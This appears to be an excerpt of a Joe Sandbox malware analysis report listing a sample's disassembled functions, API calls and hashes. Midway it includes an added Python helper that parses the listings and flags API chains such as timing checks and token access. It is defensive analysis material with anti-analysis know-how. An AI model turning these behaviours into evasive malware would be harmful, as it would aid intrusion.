• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 61dcd61879f9405c0b890c43dd9cbdf6b0bad36be9c139ebb8a50b92d577dbec
• Instruction ID: 9a1ede1cd43702f1e43a020b3a11dfc7d7d42e7a5908099855e4bb03e5c19e66
• Opcode Fuzzy Hash: 61dcd61879f9405c0b890c43dd9cbdf6b0bad36be9c139ebb8a50b92d577dbec
• Instruction Fuzzy Hash: E8110876904654BBCB01AFA89C19AEF7FAFAB46320F004215F914E33D0D6B19A008BF0
APIs
• CreateThread.KERNEL32(00000000,?,005FCFF9,00000000,00000004,00000000), ref: 005FD218
• GetLastError.KERNEL32 ref: 005FD224
• __dosmaperr.LIBCMT ref: 005FD22B
• ResumeThread.KERNEL32(00000000), ref: 005FD249
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 7695b8a3936d2455dd218a77530ec16c95a1d6eecd9125d8afc97db19ea8f581
• Instruction ID: 047098645dbc3e973ae615aad68e057bbb3f01540e932bef9f638cc53e5068b9
• Opcode Fuzzy Hash: 7695b8a3936d2455dd218a77530ec16c95a1d6eecd9125d8afc97db19ea8f581
• Instruction Fuzzy Hash: EA01803A80560DBBDB116BA5DC09ABB7E7AFF82731F104219FA25961D0DBB58901C6B0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
• GetStockObject.GDI32(00000011), ref: 005D6060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 1f8009845728019f687f2190abcc8ba25a1931967092ce1e6a0107a795ca4b65
• Instruction ID: 4f9db831795deb15ce2aabeecd303313076910738766a085426d5b6561f112bf
• Opcode Fuzzy Hash: 1f8009845728019f687f2190abcc8ba25a1931967092ce1e6a0107a795ca4b65
• Instruction Fuzzy Hash: A9118E72101508BFEF225F98CC58AEABF6AFF09364F040107FA1452110C7729C61DB91
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 005F3B56
                                                                                  • Part of subcall function 005F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 005F3AD2
                                                                                  • Part of subcall function 005F3AA3: ___AdjustPointer.LIBCMT ref: 005F3AED
                                                                                • _UnwindNestedFrames.LIBCMT ref: 005F3B6B
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 005F3B7C
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 005F3BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction ID: 2e8e7f6edcbb35a034975a3fce74a2296d3d26c3300556e946aa06c036ddff1d
                                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction Fuzzy Hash: 5201C53210014EBBEF125E95CC4AEEB7F6AFF98754F044015FA4866121C63AE9619BA0
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005D13C6,00000000,00000000,?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue), ref: 006030A5
                                                                                • GetLastError.KERNEL32(?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue,00672290,FlsSetValue,00000000,00000364,?,00602E46), ref: 006030B1
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue,00672290,FlsSetValue,00000000), ref: 006030BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 5e9badd64de266b9acae1c648eec28b7d95cbcab445b2cef9f1da4ad8619df9d
                                                                                • Instruction ID: 5e85198d93f989791ce62eb5246cec1f97c53c744346cf1e61e2a5405c62dacc
                                                                                • Opcode Fuzzy Hash: 5e9badd64de266b9acae1c648eec28b7d95cbcab445b2cef9f1da4ad8619df9d
                                                                                • Instruction Fuzzy Hash: 9A01F732392732ABCB354B799C449A77B9EAF05B72B104621F947E73C0D721DA02C6E0
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0063747F
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00637497
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006374AC
                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006374CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: 2e2ff4718e7d88dc5df3053aeeac34754bb0836c7a68febb35b87a11d7b3fb83
                                                                                • Instruction ID: 785a15b7e73cb4094919614026cf489c16ba3f32c543ab3b9850caf44d8f9231
                                                                                • Opcode Fuzzy Hash: 2e2ff4718e7d88dc5df3053aeeac34754bb0836c7a68febb35b87a11d7b3fb83
                                                                                • Instruction Fuzzy Hash: CC11A1F12057149BE730CF54EC08BA27BFEEB00B10F108569E656D6152D7B0F904DB90
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0C4
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0E9
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0F3
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B126
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                • Opcode ID: 9798e215e27d5cbf3aefaeebe3a01d38fcbebf301dd469c50244b129051baa19
                                                                                • Instruction ID: fc639010470c4e08c0334ce0fd4f0d0ba4e5681b48e7b9b58c9986f709f3d313
                                                                                • Opcode Fuzzy Hash: 9798e215e27d5cbf3aefaeebe3a01d38fcbebf301dd469c50244b129051baa19
                                                                                • Instruction Fuzzy Hash: 4211A130C0091DD7CF04AFE4E9586FEBF79FF0A310F005085DA81B6245CB7055508B91
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00632DC5
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00632DD6
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00632DDD
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00632DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: 09326d93d4fea2454aa2a91ad71edc359f36d6993a5630d7864c7dab3bf08f25
                                                                                • Instruction ID: 33dd2fb42d4b6a75bd1ca6b05174d9083e81c17f964e0b21d632d08e106aca6d
                                                                                • Opcode Fuzzy Hash: 09326d93d4fea2454aa2a91ad71edc359f36d6993a5630d7864c7dab3bf08f25
                                                                                • Instruction Fuzzy Hash: 6EE06D71101A247ADB202B63DC0DEFB7E6EEF42BB1F001015F106D10809AE19841D6F0
                                                                                APIs
                                                                                  • Part of subcall function 005E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                  • Part of subcall function 005E9639: BeginPath.GDI32(?), ref: 005E96B9
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00668887
                                                                                • LineTo.GDI32(?,?,?), ref: 00668894
                                                                                • EndPath.GDI32(?), ref: 006688A4
                                                                                • StrokePath.GDI32(?), ref: 006688B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 0a1b10da62eb212acf73720382b4ff200cd683c3373c7bbc4e7acdbd7189ab5c
                                                                                • Instruction ID: 32a2bef9fbc4a3c98e301e1901cfa415da6f9bcecc5deedc3efea6ccf5344ace
                                                                                • Opcode Fuzzy Hash: 0a1b10da62eb212acf73720382b4ff200cd683c3373c7bbc4e7acdbd7189ab5c
                                                                                • Instruction Fuzzy Hash: DEF05E36041659FADB126F94AC0DFDE3F5AAF0A320F048100FA51661E1C7B55511CFE5
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 005E98CC
                                                                                • SetTextColor.GDI32(?,?), ref: 005E98D6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 005E98E9
                                                                                • GetStockObject.GDI32(00000005), ref: 005E98F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObjectStockText
                                                                                • String ID:
                                                                                • API String ID: 4037423528-0
                                                                                • Opcode ID: 9c5f453bfcb43e1e0d8872b698df8577ca8b7b3a666cc9f6d9afedb2f5b7d445
                                                                                • Instruction ID: 8d2af7892eb1b3765c0781f5782f2ef160d8a259e7b75cb1d088376722bac863
                                                                                • Opcode Fuzzy Hash: 9c5f453bfcb43e1e0d8872b698df8577ca8b7b3a666cc9f6d9afedb2f5b7d445
                                                                                • Instruction Fuzzy Hash: E0E06531244A80AADB215F78BC09BE97F52AB12335F049219F6FA940E1C7B146509F11
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 00631634
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006311D9), ref: 0063163B
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006311D9), ref: 00631648
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006311D9), ref: 0063164F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 70088db9da140307b3913abb5a8c67aadc4738c28fbb4ebbb7a88c3cbe3b57bc
                                                                                • Instruction ID: 2c84387f51d553a0066eea0fa63cb323439a27f3966dc19dc8e1c9e576c1f133
                                                                                • Opcode Fuzzy Hash: 70088db9da140307b3913abb5a8c67aadc4738c28fbb4ebbb7a88c3cbe3b57bc
                                                                                • Instruction Fuzzy Hash: C5E08631601611EBD7201FE19D0DFA63B7EAF467A1F144808F685DD080D6B54440C790
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 0062D858
                                                                                • GetDC.USER32(00000000), ref: 0062D862
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062D882
                                                                                • ReleaseDC.USER32(?), ref: 0062D8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 5db9c0863c413274801ee1d3dcffe49e1c6745b7ff7af1d29a8de39d5482cabf
                                                                                • Instruction ID: 493ab8c2829fd371b0b018db4f1264ec927950bfe8f9e0e973ac5fe37712d6c9
                                                                                • Opcode Fuzzy Hash: 5db9c0863c413274801ee1d3dcffe49e1c6745b7ff7af1d29a8de39d5482cabf
                                                                                • Instruction Fuzzy Hash: 9FE01AB5800605EFCB419FA0D80C67DBFB2FB08320F14A40AE88AE7350C7B95901AF54
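The function listings above (the QueryPerformanceCounter/Sleep pair at 0063B0C4, the LoadLibraryExW retry at 006030A5, the SendMessageTimeoutW/AttachThreadInput chain at 00632DC5, the OpenThreadToken/OpenProcessToken pair at 00631634) are the parts of this report a reviewer actually reads, and the raw argument dumps are easy to misread. The following is an added triage helper, not Joe Sandbox code and not part of the original report: it parses "APIs" blocks in exactly the shape shown on this page, decodes a few standard Win32 constants that appear in them (0x800 = LOAD_LIBRARY_SEARCH_SYSTEM32, 0x11 = DEFAULT_GUI_FONT, 0x30 = WM_SETFONT, 0xC = BITSPIXEL, and so on), and flags API chains worth a second look. The chain rules are heuristics chosen for this example, and the sample blocks are constructed from the listings above.

```python
"""Triage helper for the "APIs" blocks of a Joe Sandbox function listing.

Added example, not Joe Sandbox code. Parses call lines in the shape shown
on this page, decodes a few well-known Win32 constants, and flags API chains
that deserve a closer look before the function is dismissed as runtime noise.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One call line, e.g.
#   • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,...), ref: 006030A5
#   • Part of subcall function 005F3AA3: ___AdjustPointer.LIBCMT ref: 005F3AED
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# (API, zero-based argument index) -> value -> name. Standard Win32 values.
KNOWN_ARGS = {
    ("LoadLibraryExW", 2): {0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32"},
    ("GetStockObject", 0): {5: "NULL_BRUSH", 17: "DEFAULT_GUI_FONT"},
    ("SendMessageW", 1): {0x30: "WM_SETFONT"},
    ("GetSysColor", 0): {8: "COLOR_WINDOWTEXT"},
    ("SetBkMode", 1): {1: "TRANSPARENT"},
    ("GetDeviceCaps", 1): {12: "BITSPIXEL"},
    ("SendMessageTimeoutW", 4): {2: "SMTO_ABORTIFHUNG"},
    ("LoadTypeLibEx", 1): {2: "REGKIND_NONE"},
}

# Heuristic chain rules (assumptions of this example): every named API must
# appear in the same block for the rule to fire.
CHAIN_RULES = [
    ({"QueryPerformanceCounter", "Sleep"},
     "timing check: Sleep bracketed by QueryPerformanceCounter reads"),
    ({"SendMessageTimeoutW", "GetWindowThreadProcessId", "AttachThreadInput"},
     "attaches to another window's input queue"),
    ({"OpenThreadToken", "OpenProcessToken"},
     "opens its own thread/process token"),
    ({"LoadLibraryExW", "GetLastError"},
     "LoadLibraryExW with a fallback after failure: check the search flags"),
]


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str
    sub: Optional[str]  # callee address when the line is "Part of subcall"


def parse_calls(block: str) -> List[Call]:
    calls = []
    for line in block.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue  # hashes, dump sources and other non-call bullets
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
    return calls


def decode_args(call: Call) -> Dict[int, str]:
    """Symbolic names for the argument positions we know how to read.

    Caveat: the report's argument list is a raw stack snapshot at the call
    site. It runs past the API's real parameter count, and for a parameterless
    API such as GetCurrentProcess it shows the values already pushed for the
    next call (the 00000028 in the token block is OpenProcessToken's
    DesiredAccess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY).
    """
    decoded = {}
    for i, raw in enumerate(call.args):
        table = KNOWN_ARGS.get((call.name, i))
        if table and re.fullmatch(r"[0-9A-Fa-f]{1,8}", raw):
            name = table.get(int(raw, 16))
            if name:
                decoded[i] = name
    return decoded


def flag_chains(calls: List[Call]) -> List[str]:
    names = {c.name for c in calls}
    return [why for needed, why in CHAIN_RULES if needed <= names]


# Constructed sample input, copied from the listings on this page.
TIMING_BLOCK = """APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B126
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
"""
LOADLIB_BLOCK = """APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005D13C6,00000000,00000000,?,0060301A), ref: 006030A5
• GetLastError.KERNEL32(?,0060301A,005D13C6,00000000), ref: 006030B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0060301A,005D13C6), ref: 006030BF
"""
CATCH_BLOCK = """APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 005F3B56
  • Part of subcall function 005F3AA3: ___AdjustPointer.LIBCMT ref: 005F3AED
"""

if __name__ == "__main__":
    for block in (TIMING_BLOCK, LOADLIB_BLOCK, CATCH_BLOCK):
        calls = parse_calls(block)
        for c in calls:
            print(f"{c.ref} {c.name}.{c.module} {decode_args(c)}")
        print("flags:", flag_chains(calls) or "none")
```

Two practical notes. First, the LoadLibraryExW pair above is the search-path-hardened load (LOAD_LIBRARY_SEARCH_SYSTEM32) followed, after GetLastError, by a plain load with flags 0; the surrounding FlsSetValue strings mark it as the C runtime resolving optional kernel32 exports, so the fallback itself is not a finding, but the same shape in hand-written code would be a DLL search-order concern. Second, a rule firing only says "read this function"; the QueryPerformanceCounter/Sleep chain is consistent with both a debugger timing check and an ordinary wait loop, and the disassembly, not the API list, decides which.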
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 0062D86C
                                                                                • GetDC.USER32(00000000), ref: 0062D876
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062D882
                                                                                • ReleaseDC.USER32(?), ref: 0062D8A3
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00644ED4
                                                                                Similarity
                                                                                • API ID: Connection_wcslen
                                                                                • String ID: *$LPT
                                                                                • API String ID: 1725874428-3443410124
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 005FE30D
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0062569E,00000000,?,0066CC08,?,00000000,00000000), ref: 006578DD
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • CharUpperBuffW.USER32(0062569E,00000000,?,0066CC08,00000000,?,00000000,00000000), ref: 0065783B
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$_wcslen
                                                                                • String ID: <si
                                                                                • API String ID: 3544283678-3796645423
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 005EF2A2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 005EF2BB
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 006557E0
                                                                                • _wcslen.LIBCMT ref: 006557EC
                                                                                Similarity
                                                                                • API ID: BuffCharUpper_wcslen
                                                                                • String ID: CALLARGARRAY
                                                                                • API String ID: 157775604-1150593374
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0064D130
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0064D13A
                                                                                Similarity
                                                                                • API ID: CrackInternet_wcslen
                                                                                • String ID: |
                                                                                • API String ID: 596671847-2343686810
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00663621
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0066365C
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0066461F
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00664634
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                APIs
